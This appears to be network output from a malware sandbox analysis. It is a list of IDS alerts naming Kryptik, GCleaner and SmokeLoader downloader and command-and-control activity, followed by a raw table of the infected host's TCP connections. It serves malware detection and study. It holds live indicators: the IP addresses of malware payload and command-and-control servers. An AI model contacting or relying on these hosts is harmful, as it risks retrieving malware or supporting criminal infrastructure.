2024-08-21T11:00:41.569507+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60097 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:41.569507+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60097 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:24.456510+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60087 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:18.862793+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60083 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:32.305962+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60091 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:32.305962+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60091 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:16.527142+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59940 | 443 | 192.168.2.4 | 172.67.132.113
2024-08-21T10:58:50.306446+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60015 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:50.306446+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60015 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:02.352307+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60024 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:02.352307+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60024 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:28.129049+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60046 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:57:52.783806+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 59968 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:52.783806+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 59968 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:03.226772+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60118 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:03.226772+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60118 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:07.797527+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59991 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:59:39.386329+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60054 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:57:50.318003+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 59977 | 80 | 192.168.2.4 | 188.40.141.211
2024-08-21T10:57:50.318003+0200 | TCP | 2847712 | ETPRO MALWARE Sharik/Smokeloader CnC Beacon 17 | 1 | 59977 | 80 | 192.168.2.4 | 188.40.141.211
2024-08-21T10:57:50.318003+0200 | TCP | 2850316 | ETPRO MALWARE Observed SmokeLoader CnC Activity | 1 | 59977 | 80 | 192.168.2.4 | 188.40.141.211
2024-08-21T10:58:58.337526+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60022 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:58.337526+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60022 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:01:05.881179+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60115 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:01:05.881179+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60115 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:02.177324+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59988 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:57:39.501144+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59972 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:47.184475+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60104 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:58.477405+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60112 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:49.650539+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60103 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:49.650539+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60103 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:34.229229+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60002 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:34.229229+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60002 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:24.275254+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60085 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:24.275254+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60085 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:55.253881+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60063 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:55.253881+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60063 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:22.484880+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60041 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:58:42.262286+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60010 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:42.262286+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60010 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:56.540566+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59983 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:00:45.634104+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60101 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:45.634104+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60101 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:14.587628+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60033 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:14.587628+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60033 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:35.024805+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60048 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:35.024805+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60048 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:30.660918+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60045 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:30.660918+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60045 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:13.448105+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59994 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:59:59.336871+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60066 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:59.336871+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60066 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:53.666394+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60106 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:53.666394+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60106 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:14.158762+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 59980 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:14.158762+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 59980 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:57.690084+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60110 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:57.690084+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60110 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:43.196401+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60055 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:43.196401+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60055 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:22.594371+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59953 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:58:24.786762+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60000 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T11:01:01.853398+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60113 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:01:01.853398+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60113 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:46.290141+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60013 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:46.290141+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60013 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:47.213152+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60057 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:47.213152+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60057 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:50.895226+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 59978 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:59:56.302056+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60067 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:59:06.398217+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60027 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:06.398217+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60027 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:37.305394+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60093 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:37.305394+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60093 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:19.697545+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60082 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:19.697545+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60082 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:07.649429+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60073 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:07.649429+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60073 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:03.490004+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60070 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:03.490004+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60070 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:26.213014+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 59995 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:26.213014+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 59995 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:22.618763+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60040 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:22.618763+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60040 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:39.132181+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60052 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:39.132181+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60052 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:10.430870+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60031 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:10.430870+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60031 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:15.696828+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60078 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:15.696828+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60078 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:35.757223+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60096 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:58:38.243341+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60006 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:38.243341+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60006 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:57:50.877231+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 59977 | 80 | 192.168.2.4 | 188.40.141.211
2024-08-21T10:57:50.877231+0200 | TCP | 2847712 | ETPRO MALWARE Sharik/Smokeloader CnC Beacon 17 | 1 | 59977 | 80 | 192.168.2.4 | 188.40.141.211
2024-08-21T10:57:50.877231+0200 | TCP | 2850316 | ETPRO MALWARE Observed SmokeLoader CnC Activity | 1 | 59977 | 80 | 192.168.2.4 | 188.40.141.211
2024-08-21T10:59:50.692749+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60062 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:58:54.322701+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60018 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:58:54.322701+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60018 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:28.289954+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60088 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T11:00:28.289954+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60088 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:45.053323+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 60058 | 443 | 192.168.2.4 | 162.159.130.233
2024-08-21T10:59:51.243221+0200 | TCP | 2850107 | ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload | 1 | 60061 | 80 | 192.168.2.4 | 45.9.20.13
2024-08-21T10:59:51.243221+0200 | TCP | 2850938 | ETPRO MALWARE GCleaner Downloader Activity M6 | 1 | 60061 | 80 | 192.168.2.4 | 45.9.20.13
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Aug 21, 2024 10:57:18.703766108 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:18.708525896 CEST276435995045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:19.521554947 CEST276435995045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:19.523924112 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:19.524736881 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:19.782980919 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:21.951450109 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:21.951479912 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:21.951597929 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:21.951958895 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:21.951978922 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.421165943 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.481359959 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:22.481374979 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.594372034 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.594433069 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.594482899 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:22.600040913 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:24.540921926 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:24.545737028 CEST276435995845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:24.545816898 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:24.546155930 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:24.550996065 CEST276435995845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:25.366182089 CEST276435995845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:25.367302895 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:25.367546082 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:27.615659952 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:27.615695953 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:27.615762949 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:27.616017103 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:27.616030931 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.078911066 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.082354069 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:28.082385063 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.229324102 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.229366064 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.229440928 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:28.230115891 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:28.273925066 CEST804973445.133.1.107192.168.2.4
                                      Aug 21, 2024 10:57:28.274003983 CEST4973480192.168.2.445.133.1.107
                                      Aug 21, 2024 10:57:28.275230885 CEST4973480192.168.2.445.133.1.107
                                      Aug 21, 2024 10:57:28.280065060 CEST804973445.133.1.107192.168.2.4
                                      Aug 21, 2024 10:57:28.465111971 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.465190887 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.465378046 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.466900110 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.466933966 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.950788975 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.950858116 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.952613115 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.952617884 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.952950001 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.017107010 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.064498901 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.516429901 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.516602039 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.516702890 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.565164089 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.565201998 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.565213919 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.565218925 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.898149014 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:29.902998924 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:29.903069019 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:29.903273106 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:29.908073902 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:30.385328054 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:30.390274048 CEST276435996645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:30.390567064 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:30.390830040 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:30.395608902 CEST276435996645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:30.610217094 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:30.610367060 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:30.611092091 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:30.637482882 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:30.642270088 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:30.642353058 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:30.643382072 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:30.648216009 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:31.239882946 CEST276435996645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:31.241185904 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:31.241692066 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:31.418451071 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:31.423537016 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:31.423621893 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:31.423799038 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:31.428807974 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:33.114460945 CEST4973580192.168.2.4208.95.112.1
                                      Aug 21, 2024 10:57:33.243685961 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.243714094 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.243788958 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.244193077 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.244204998 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.738992929 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.743833065 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.743840933 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.894421101 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.894561052 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.894634962 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.895313025 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:36.244864941 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:36.250035048 CEST276435997045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:36.250145912 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:36.250515938 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:36.255544901 CEST276435997045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:37.085571051 CEST276435997045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:37.085666895 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:37.093982935 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:37.291589022 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:37.296601057 CEST480559971135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:37.296711922 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:37.572859049 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:37.577908993 CEST480559971135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:38.900398016 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:38.900434971 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:38.900511980 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:38.900944948 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:38.900958061 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.022706985 CEST480559971135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:39.027128935 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:39.227078915 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:39.370297909 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.371570110 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:39.371582985 CEST44359972162.159.130.233192.168.2.4
